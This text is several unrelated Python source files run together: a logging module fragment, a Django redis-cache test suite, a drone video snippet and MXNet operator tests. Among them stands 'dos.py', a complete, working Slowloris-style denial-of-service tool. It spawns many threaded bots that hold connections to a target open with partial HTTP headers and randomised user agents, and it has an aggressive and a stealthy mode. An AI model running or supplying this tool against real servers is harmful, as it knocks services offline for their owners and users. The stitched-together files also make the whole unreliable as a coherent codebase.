self._last_update = time.time()
timed_record = copy.copy(record)
timed_record.msg = (
"{clear_line}{color} {cursor}{clear} " "{message}{suffix}"
).format(
clear_line=self.clear_lines(),
color=color,
cursor=Character.LAMBDA,
clear=Format.CLEAR,
message=record.msg,
suffix=suffix,
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
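# Background refresher: while the handler is active, the most recent in-progress record is
# re-emitted every 0.1s with an elapsed-time suffix once it has been on screen longer than THRESHOLD.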
def _thread(self) -> None:
while not self._terminate:
if self._record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(self._record, age)
time.sleep(0.1)
def terminate(self) -> None:
last_record = self._last_record
if last_record and last_record.levelname not in self.LINE_BREAKING_LEVELS:
sys.stderr.write("\n")
# Reset terminal.
sys.stderr.write(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR)
sys.stderr.flush()
self._terminate = True
def initialize(arguments: argparse.Namespace) -> None:
if arguments.noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
arguments.timed_stream_handler = None
else:
stream_handler = TimedStreamHandler()
arguments.timed_stream_handler = stream_handler
handlers = [stream_handler] # type: List[logging.Handler]
if not arguments.noninteractive:
try:
os.mkdir(".pyre")
except FileExistsError:
pass
file_handler = logging.FileHandler(".pyre/pyre.stderr")
file_handler.setFormatter(SectionFormatter())
file_handler.setLevel(logging.DEBUG)
handlers.append(file_handler)
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=handlers)
def cleanup(arguments: argparse.Namespace) -> None:
if arguments.timed_stream_handler:
arguments.timed_stream_handler.terminate()
output = stdout.getvalue()
if output:
sys.stdout.write(output + "\n")
class Buffer:
THRESHOLD = 0.1 # type: float
_flushed = False # type: bool
def __init__(self, section: str, data: List[str]) -> None:
self._section = section # type: str
self._data = data # type: List[str]
self._lock = threading.RLock() # type: threading.RLock
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def append(self, line: str) -> None:
self._data.append(line)
def flush(self) -> None:
with self._lock:
if self._flushed is True:
return
self._flushed = True
message = "\n".join(self._data)
if self._section == "ERROR":
LOG.error(message)
elif self._section == "INFO":
LOG.info(message)
elif self._section == "WARNING":
LOG.warning(message)
elif self._section == "PROGRESS":
LOG.info(message)
elif self._section == "PARSER":
LOG.error(message)
else:
LOG.debug("[%s] %s", self._section, message)
def _thread(self) -> None:
time.sleep(self.THRESHOLD)
with self._lock:
if not self._flushed:
self.flush()
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
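# --- Usage sketch (not part of the original module) ---
# A minimal, hedged example of how the Buffer helper above could be exercised; the section
# name and messages are illustrative assumptions.
if __name__ == "__main__":
    demo = Buffer("ERROR", ["something went wrong"])
    demo.append("with more detail")
    demo.flush()  # both lines are emitted through LOG.error() as a single message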
|
base_tests.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from hashlib import sha1
import os
import subprocess
import threading
import time
try:
import cPickle as pickle
except ImportError:
import pickle
from django.core.cache import caches
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, override_settings
from django.utils.encoding import force_bytes
import redis
from tests.testapp.models import Poll, expensive_calculation
from redis_cache.cache import RedisCache, pool
from redis_cache.constants import KEY_EXPIRED, KEY_NON_VOLATILE
from redis_cache.utils import get_servers, parse_connection_kwargs
REDIS_PASSWORD = 'yadayada'
LOCATION = "127.0.0.1:6381"
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
def start_redis_servers(servers, db=None, master=None):
"""Creates redis instances using specified locations from the settings.
Returns list of Popen objects
"""
processes = []
devnull = open(os.devnull, 'w')
master_connection_kwargs = master and parse_connection_kwargs(
master,
db=db,
password=REDIS_PASSWORD
)
for i, server in enumerate(servers):
connection_kwargs = parse_connection_kwargs(
server,
db=db,
password=REDIS_PASSWORD, # will be overridden if specified in `server`
)
parameters = dict(
port=connection_kwargs.get('port', 0),
requirepass=connection_kwargs['password'],
)
is_socket = server.startswith('unix://') or server.startswith('/')
if is_socket:
parameters.update(
port=0,
unixsocket='/tmp/redis{0}.sock'.format(i),
unixsocketperm=755,
)
if master and not connection_kwargs == master_connection_kwargs:
parameters.update(
masterauth=master_connection_kwargs['password'],
slaveof="{host} {port}".format(
host=master_connection_kwargs['host'],
port=master_connection_kwargs['port'],
)
)
args = ['./redis/src/redis-server'] + [
"--{parameter} {value}".format(parameter=parameter, value=value)
for parameter, value in parameters.items()
]
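# Each (parameter, value) pair becomes a "--<name> <value>" redis-server argument, e.g.
# "--port 6381 --requirepass yadayada" for the default test LOCATION (values are illustrative).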
p = subprocess.Popen(args, stdout=devnull)
processes.append(p)
return processes
class SetupMixin(object):
processes = None
@classmethod
def tearDownClass(cls):
for p in cls.processes:
p.kill()
cls.processes = None
# Give redis processes some time to shutdown
# time.sleep(.1)
def setUp(self):
if self.__class__.processes is None:
from django.conf import settings
cache_settings = settings.CACHES['default']
servers = get_servers(cache_settings['LOCATION'])
options = cache_settings.get('OPTIONS', {})
db = options.get('db', 0)
master = options.get('MASTER_CACHE')
self.__class__.processes = start_redis_servers(
servers,
db=db,
master=master
)
# Give redis processes some time to startup
time.sleep(.1)
self.reset_pool()
self.cache = self.get_cache()
def tearDown(self):
# clear caches to allow @override_settings(CACHES=...) to work.
caches._caches.caches = {}
# Sometimes it will be necessary to skip this method because we need to
# test default initialization and that may be using a different port
# than the test redis server.
if hasattr(self, '_skip_tearDown') and self._skip_tearDown:
self._skip_tearDown = False
return
self.cache.clear()
def reset_pool(self):
pool.reset()
def get_cache(self, backend=None):
return caches[backend or 'default']
class BaseRedisTestCase(SetupMixin):
def test_simple(self):
# Simple cache set/get works
self.cache.set("key", "value")
self.assertEqual(self.cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
self.cache.add("addkey1", "value")
result = self.cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(self.cache.get("addkey1"), "value")
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(self.cache.get("does_not_exist"))
self.assertEqual(self.cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
self.cache.set('a', 'a')
self.cache.set('b', 'b')
self.cache.set('c', 'c')
self.cache.set('d', 'd')
self.assertEqual(self.cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(self.cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_get_many_works_with_empty_keys_array(self):
self.assertEqual(self.cache.get_many([]), {})
def test_get_many_with_manual_integer_insertion(self):
keys = ['a', 'b', 'c', 'd']
for i, key in enumerate(keys):
self.cache.set(key, i)
self.assertEqual(self.cache.get_many(keys), {'a': 0, 'b': 1, 'c': 2, 'd': 3})
def test_get_many_with_automatic_integer_insertion(self):
keys = ['a', 'b', 'c', 'd']
for i, key in enumerate(keys):
self.cache.set(key, i)
self.assertEqual(self.cache.get_many(keys), {'a': 0, 'b': 1, 'c': 2, 'd': 3})
def test_delete(self):
# Cache keys can be deleted
self.cache.set("key1", "spam")
self.cache.set("key2", "eggs")
self.assertEqual(self.cache.get("key1"), "spam")
self.cache.delete("key1")
self.assertIsNone(self.cache.get("key1"))
self.assertEqual(self.cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
self.cache.set("hello1", "goodbye1")
self.assertIn("hello1", self.cache)
self.assertNotIn("goodbye1", self.cache)
def test_in(self):
# The in operator can be used to inspect cache contents
self.cache.set("hello2", "goodbye2")
self.assertIn("hello2", self.cache)
self.assertNotIn("goodbye2", self.cache)
def test_incr(self):
# Cache values can be incremented
self.cache.set('answer', 41)
self.assertEqual(self.cache.get('answer'), 41)
self.assertEqual(self.cache.incr('answer'), 42)
self.assertEqual(self.cache.get('answer'), 42)
self.assertEqual(self.cache.incr('answer', 10), 52)
self.assertEqual(self.cache.get('answer'), 52)
self.assertRaises(ValueError, self.cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
self.cache.set('answer', 43)
self.assertEqual(self.cache.decr('answer'), 42)
self.assertEqual(self.cache.get('answer'), 42)
self.assertEqual(self.cache.decr('answer', 10), 32)
self.assertEqual(self.cache.get('answer'), 32)
self.assertRaises(ValueError, self.cache.decr, 'does_not_exist')
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
self.cache.set("stuff", stuff)
self.assertEqual(self.cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
self.cache.set('question', my_poll)
cached_poll = self.cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
self.cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
self.cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
self.cache.set('expire1', 'very quickly', 1)
self.cache.set('expire2', 'very quickly', 1)
self.cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(self.cache.get("expire1"), None)
self.cache.add("expire2", "newvalue")
self.assertEqual(self.cache.get("expire2"), "newvalue")
self.assertEqual("expire3" in self.cache, False)
def test_set_expiration_timeout_None(self):
key, value = 'key', 'value'
self.cache.set(key, value, timeout=None)
self.assertIsNone(self.cache.ttl(key))
def test_set_expiration_timeout_zero(self):
key, value = self.cache.make_key('key'), 'value'
self.cache.set(key, value, timeout=0)
self.assertEqual(self.cache.get_client(key).ttl(key), KEY_EXPIRED)
self.assertNotIn(key, self.cache)
def test_set_expiration_timeout_negative(self):
key, value = self.cache.make_key('key'), 'value'
self.cache.set(key, value, timeout=-1)
self.assertNotIn(key, self.cache)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}  # distinct key; a duplicate 'ascii' key would silently shadow the first entry
}
for (key, value) in stuff.items():
self.cache.set(key, value)
self.assertEqual(self.cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cachable
from zlib import compress, decompress
value = b'value_to_be_compressed'
compressed_value = compress(value)
self.cache.set('binary1', compressed_value)
compressed_result = self.cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result))
def test_set_many(self):
# Multiple keys can be set using set_many
self.cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(self.cache.get("key1"), "spam")
self.assertEqual(self.cache.get("key2"), "eggs")
def test_set_many_works_with_empty_dict(self):
# This test passes if no exception is raised
self.cache.set_many({})
self.cache.set_many({}, version=2)
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
self.cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(self.cache.get("key1"))
self.assertIsNone(self.cache.get("key2"))
def test_set_many_version(self):
self.cache.set_many({"key1": "spam", "key2": "eggs"}, version=2)
self.assertEqual(self.cache.get("key1", version=2), "spam")
self.assertEqual(self.cache.get("key2", version=2), "eggs")
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
self.cache.set("key1", "spam")
self.cache.set("key2", "eggs")
self.cache.set("key3", "ham")
self.cache.delete_many(["key1", "key2"])
self.assertIsNone(self.cache.get("key1"))
self.assertIsNone(self.cache.get("key2"))
self.assertEqual(self.cache.get("key3"), "ham")
# Test that passing an empty list fails silently
self.cache.delete_many([])
def test_clear(self):
# The cache can be emptied using clear
self.cache.set("key1", "spam")
self.cache.set("key2", "eggs")
self.cache.clear()
self.assertIsNone(self.cache.get("key1"))
self.assertIsNone(self.cache.get("key2"))
def test_long_timeout(self):
"""Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
"""
self.cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(self.cache.get('key1'), 'eggs')
self.cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(self.cache.get('key2'), 'ham')
self.cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(self.cache.get('key3'), 'sausage')
self.assertEqual(self.cache.get('key4'), 'lobster bisque')
def test_incr_version(self):
if isinstance(self.cache, RedisCache):
key = "key1"
self.cache.set(key, "spam", version=1)
self.assertEqual(self.cache.make_key(key), ':1:key1')
new_version = self.cache.incr_version(key, 1)
self.assertEqual(new_version, 2)
new_key = self.cache.make_key(key, version=new_version)
self.assertEqual(new_key, ':2:key1')
self.assertIsNone(self.cache.get(key, version=1))
self.assertEqual(self.cache.get(key, version=2), 'spam')
def test_pickling_cache_object(self):
p = pickle.dumps(self.cache)
cache = pickle.loads(p)
# Now let's do a simple operation using the unpickled cache object
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_float_caching(self):
self.cache.set('a', 1.1)
a = self.cache.get('a')
self.assertEqual(a, 1.1)
def test_string_float_caching(self):
self.cache.set('a', '1.1')
a = self.cache.get('a')
self.assertEqual(a, '1.1')
def test_setting_string_integer_retrieves_string(self):
self.assertTrue(self.cache.set("foo", "1"))
self.assertEqual(self.cache.get("foo"), "1")
def test_setting_bool_retrieves_bool(self):
self.assertTrue(self.cache.set("bool_t", True))
self.assertTrue(self.cache.get("bool_t"))
self.assertTrue(self.cache.set("bool_f", False))
self.assertFalse(self.cache.get("bool_f"))
def test_delete_pattern(self):
data = {
'a': 'a',
'b': 'b',
'aa': 'aa',
'bb': 'bb',
'aaa': 'aaa',
'bbb': 'bbb',
}
self.cache.set_many(data)
self.cache.delete_pattern('aa*')
items = self.cache.get_many(data.keys())
self.assertEqual(len(items), 4)
self.cache.delete_pattern('b?b')
items = self.cache.get_many(data.keys())
self.assertEqual(len(items), 3)
def test_clearing_using_version(self):
self.cache.set('a', 'a', version=1)
self.cache.set('b', 'b', version=1)
self.cache.set('a', 'a', version=2)
self.cache.set('b', 'b', version=2)
values = self.cache.get_many(['a', 'b'], version=1)
self.assertEqual(len(values), 2)
values = self.cache.get_many(['a', 'b'], version=2)
self.assertEqual(len(values), 2)
self.cache.clear(version=2)
values = self.cache.get_many(['a', 'b'], version=1)
self.assertEqual(len(values), 2)
values = self.cache.get_many(['a', 'b'], version=2)
self.assertEqual(len(values), 0)
def test_reinsert_keys(self):
self.cache._pickle_version = 0
for i in range(2000):
s = sha1(force_bytes(i)).hexdigest()
self.cache.set(s, self.cache)
self.cache._pickle_version = -1
self.cache.reinsert_keys()
def test_ttl_of_reinsert_keys(self):
self.cache.set('a', 'a', 5)
self.assertEqual(self.cache.get('a'), 'a')
self.cache.set('b', 'b', 5)
self.cache.reinsert_keys()
self.assertEqual(self.cache.get('a'), 'a')
self.assertGreater(self.cache.ttl('a'), 1)
self.assertEqual(self.cache.get('b'), 'b')
self.assertGreater(self.cache.ttl('b'), 1)
def test_get_or_set(self):
def expensive_function():
expensive_function.num_calls += 1
return 42
expensive_function.num_calls = 0
self.assertEqual(expensive_function.num_calls, 0)
value = self.cache.get_or_set('a', expensive_function, 1)
self.assertEqual(expensive_function.num_calls, 1)
self.assertEqual(value, 42)
value = self.cache.get_or_set('a', expensive_function, 1)
self.assertEqual(expensive_function.num_calls, 1)
self.assertEqual(value, 42)
value = self.cache.get_or_set('a', expensive_function, 1)
self.assertEqual(expensive_function.num_calls, 1)
self.assertEqual(value, 42)
time.sleep(2)
value = self.cache.get_or_set('a', expensive_function, 1)
self.assertEqual(expensive_function.num_calls, 2)
self.assertEqual(value, 42)
def test_get_or_set_serving_from_stale_value(self):
def expensive_function(x):
time.sleep(.5)
expensive_function.num_calls += 1
return x
expensive_function.num_calls = 0
self.assertEqual(expensive_function.num_calls, 0)
results = {}
def thread_worker(thread_id, return_value, timeout, lock_timeout, stale_cache_timeout):
value = self.cache.get_or_set(
'key',
lambda: expensive_function(return_value),
timeout,
lock_timeout,
stale_cache_timeout
)
results[thread_id] = value
thread_0 = threading.Thread(target=thread_worker, args=(0, 'a', 1, None, 1))
thread_1 = threading.Thread(target=thread_worker, args=(1, 'b', 1, None, 1))
thread_2 = threading.Thread(target=thread_worker, args=(2, 'c', 1, None, 1))
thread_3 = threading.Thread(target=thread_worker, args=(3, 'd', 1, None, 1))
thread_4 = threading.Thread(target=thread_worker, args=(4, 'e', 1, None, 1))
# First thread should complete and return its value
thread_0.start() # t = 0, valid from t = .5 - 1.5, stale from t = 1.5 - 2.5
# Second thread will start while the first thread is still working and return None.
time.sleep(.25) # t = .25
thread_1.start()
# Third thread will start after the first value is computed, but before it expires, and will
# return the first thread's value.
time.sleep(.5) # t = .75
thread_2.start()
# Fourth thread will start after the first value has expired and will re-compute its value.
# valid from t = 2.25 - 3.25, stale from t = 3.75 - 4.75.
time.sleep(1) # t = 1.75
thread_3.start()
# Fifth thread will start after the fourth thread has started to compute its value, but
# before the first thread's stale cache has expired.
time.sleep(.25) # t = 2
thread_4.start()
thread_0.join()
thread_1.join()
thread_2.join()
thread_3.join()
thread_4.join()
self.assertEqual(results, {
0: 'a',
1: None,
2: 'a',
3: 'd',
4: 'a'
})
def assertMaxConnection(self, cache, max_num):
for client in cache.clients.values():
self.assertLessEqual(client.connection_pool._created_connections, max_num)
def test_max_connections(self):
pool._connection_pools = {}
cache = caches['default']
def noop(*args, **kwargs):
pass
releases = {}
for client in cache.clients.values():
releases[client.connection_pool] = client.connection_pool.release
client.connection_pool.release = noop
self.assertEqual(client.connection_pool.max_connections, 2)
cache.set('a', 'a')
self.assertMaxConnection(cache, 1)
cache.set('a', 'a')
self.assertMaxConnection(cache, 2)
with self.assertRaises(redis.ConnectionError):
cache.set('a', 'a')
self.assertMaxConnection(cache, 2)
for client in cache.clients.values():
client.connection_pool.release = releases[client.connection_pool]
client.connection_pool.max_connections = 2 ** 31
def test_has_key_with_no_key(self):
self.assertFalse(self.cache.has_key('does_not_exist'))
def test_has_key_with_key(self):
self.cache.set('a', 'a')
self.assertTrue(self.cache.has_key('a'))
def test_ttl_set_expiry(self):
self.cache.set('a', 'a', 10)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 10)
def test_ttl_no_expiry(self):
self.cache.set('a', 'a', timeout=None)
ttl = self.cache.ttl('a')
self.assertIsNone(ttl)
def test_ttl_past_expiry(self):
self.cache.set('a', 'a', timeout=1)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 1)
time.sleep(1.1)
ttl = self.cache.ttl('a')
self.assertEqual(ttl, 0)
def test_non_existent_key(self):
"""Non-existent keys are semantically the same as keys that have
expired.
"""
ttl = self.cache.ttl('does_not_exist')
self.assertEqual(ttl, 0)
def test_persist_expire_to_persist(self):
self.cache.set('a', 'a', timeout=10)
self.cache.persist('a')
self.assertIsNone(self.cache.ttl('a'))
def test_touch_no_expiry_to_expire(self):
self.cache.set('a', 'a', timeout=None)
self.cache.touch('a', 10)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 10)
def test_touch_less(self):
self.cache.set('a', 'a', timeout=20)
self.cache.touch('a', 10)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 10)
def test_touch_more(self):
self.cache.set('a', 'a', timeout=10)
self.cache.touch('a', 20)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 20)
class ConfigurationTestCase(SetupMixin, TestCase):
@override_settings(
CACHES={
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': LOCATION,
'OPTIONS': {
'DB': 15,
'PASSWORD': 'yadayada',
'PARSER_CLASS': 'path.to.unknown.class',
'PICKLE_VERSION': 2,
'CONNECTION_POOL_CLASS': 'redis.ConnectionPool',
'CONNECTION_POOL_CLASS_KWARGS': {
'max_connections': 2,
}
},
},
}
)
def test_bad_parser_import(self):
with self.assertRaises(ImproperlyConfigured):
caches['default']
@override_settings(CACHES={
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': [
'redis://:yadayada@localhost:6381/15',
'redis://:yadayada@localhost:6382/15',
'redis://:yadayada@localhost:6383/15',
],
'OPTIONS': {
'DB': 1,
'PASSWORD': 'yadayada',
'PARSER_CLASS': 'redis.connection.HiredisParser',
'PICKLE_VERSION': -1,
'MASTER_CACHE': 'redis://:yadayada@localhost:6381/15',
},
},
})
class RedisUrlRegressionTests(SetupMixin, TestCase):
def test_unix_path_error_using_redis_url(self):
pass
|
dos.py
|
# Date: 09/25/2018
# Author: Pure-L0G1C
# Description: Dos Attack
import socket
from time import sleep
from threading import Thread
from random import randint, choice
from string import ascii_lowercase
class Useragent(object):
@property
def get_win_version(self):
versions = []
version = 4.0
while version <= 10:
versions.append(version)
version = round(version+0.1, 2)
return choice(versions)
@property
def get_chrome_version(self):
a = randint(40, 69)
b = randint(2987, 3497)
c = randint(80, 140)
return '{}.0.{}.{}'.format(a, b, c)
def get(self):
a = 'Mozilla/5.0 (Windows NT {}; Win64; x64)'.format(self.get_win_version)
b = 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{} Safari/537.36'.format(self.get_chrome_version)
return '{} {}'.format(a, b)
class Session(object):
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.session = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connect(self, header):
is_connected = False
try:
self.session.connect((self.ip, self.port))
self.send_packet(header)
is_connected = True
except:pass
finally:
return is_connected
def send_packet(self, packet):
sent = False
try:
self.session.sendall(packet)
sent = True
except:pass
finally:
return sent
def close(self):
try:
self.session.close()
except:pass
class Bot(object):
def __init__(self, ip, port, is_aggressive):
self.ip = ip
self.port = port
self.session = None
self.is_alive = True
self.useragent = None
self.useragent_usage = 0
self.max_useragent_usage = 16
self.useragent_obj = Useragent()
self.is_aggressive = is_aggressive
self._header = '''
GET /?{} HTTP/1.1\r\n
User-Agent: {}\r\n\r\n
Accept-Language: en-US,en;q=0.9\r\n
Accept-Encoding: gzip, deflate, br\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n
'''.replace('\n\n', '\n').replace('\nGET', 'GET')
def sleep(self):
for _ in range(randint(5, 10)):
if self.is_alive:
sleep(1)
def start(self):
while self.is_alive:
try:
self.get_session()
if not self.session.connect(self.header):
self.session.close()
except:pass
else:
for _ in range(2):
pkt = self.packet
if not self.is_alive:break
if self.session.send_packet(pkt):
if not self.is_aggressive:self.sleep()
else:
break
self.session.close()
def stop(self):
self.is_alive = False
if self.session:
self.session.close()
def gen_useragent(self):
if not self.useragent_usage:
self.useragent = self.useragent_obj.get()
self.useragent_usage = 0 if self.useragent_usage >= self.max_useragent_usage else self.useragent_usage+1
@property
def header(self):
self.gen_useragent()
return self._header.format(self.text, self.useragent).encode()
@property
def packet(self):
return 'X-a: {}\r\n\r\n'.format(self.text).encode()
@property
def text(self):
printables = ascii_lowercase + ''.join([str(_) for _ in range(10)])
return ''.join([choice(printables) for _ in range(randint(3, 9))])
def get_session(self):
self.session = Session(self.ip, self.port)
class BotManager(object):
def __init__(self, ip, port, is_aggressive, max_bots):
self.bots = [Bot(ip, port, is_aggressive) for _ in range(max_bots)]
self.is_alive = True
self.port = port
self.ip = ip
def start(self):
session = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:session.connect((self.ip, self.port))
except:
print('Error: Unable to connect to the target. Proceeding anyway')
for bot in self.bots:
t = Thread(target=bot.start)
t.daemon = True
t.start()
def stop(self):
for bot in self.bots:
t = Thread(target=bot.stop)
t.daemon = True
t.start()
self.is_alive = False
class Cyclops(object):
def __init__(self, ip, port, threads, is_aggressive=True):
self.ip = ip
self.port = port
self.threads = threads
self.is_aggressive = is_aggressive
self.bot_manager = BotManager(ip, port, is_aggressive, threads)
def start(self):
try:
Thread(target=self.bot_manager.start, daemon=True).start()
mode = 'Aggressive' if self.is_aggressive else 'Stealthy'
print('Target: {}:{}\nMode: {}\nBots: {}'.format(self.ip, self.port, mode, self.threads))
except:
self.bot_manager.stop()
def stop(self):
self.bot_manager.stop()
|
video-stream.py
|
# Fragment from inside a Tello GUI class (not a standalone script); the imports below are
# assumptions about what the surrounding module would provide.
import threading
import tello  # Tello SDK wrapper module (assumed)
from PIL import Image
# Connect computer to Tello via Tello's Wi-Fi
Drone = tello.Tello('', 8889)  # open socket to Tello
self.thread = threading.Thread(target=self.videoLoop)  # begin pulling video data
self.frame = self.tello.read()  # read tello video frame
image = Image.fromarray(self.frame)  # convert frame to image
self.panel.image = image  # update GUI image
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
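# (param_size tallies, per gate: input-to-hidden weights, hidden-to-hidden weights and two bias
# vectors. The first layer sees input_size inputs, later layers see state_size * directions
# inputs, and the whole count is multiplied by `directions` for bidirectional RNNs.)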
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
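# A note on the parameter-size arithmetic above (explanatory only, not part of the original test):
# the fused RNN parameter blob packs, per gate and per direction, an input-to-hidden weight matrix,
# a hidden-to-hidden weight matrix and two bias vectors, so the first layer contributes
#   (input_size * state_size + state_size * state_size + 2 * state_size) * ngates
# elements, while every remaining layer sees an input of size state_size * directions, and the
# whole count is finally multiplied by the number of directions.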
@pytest.mark.serial
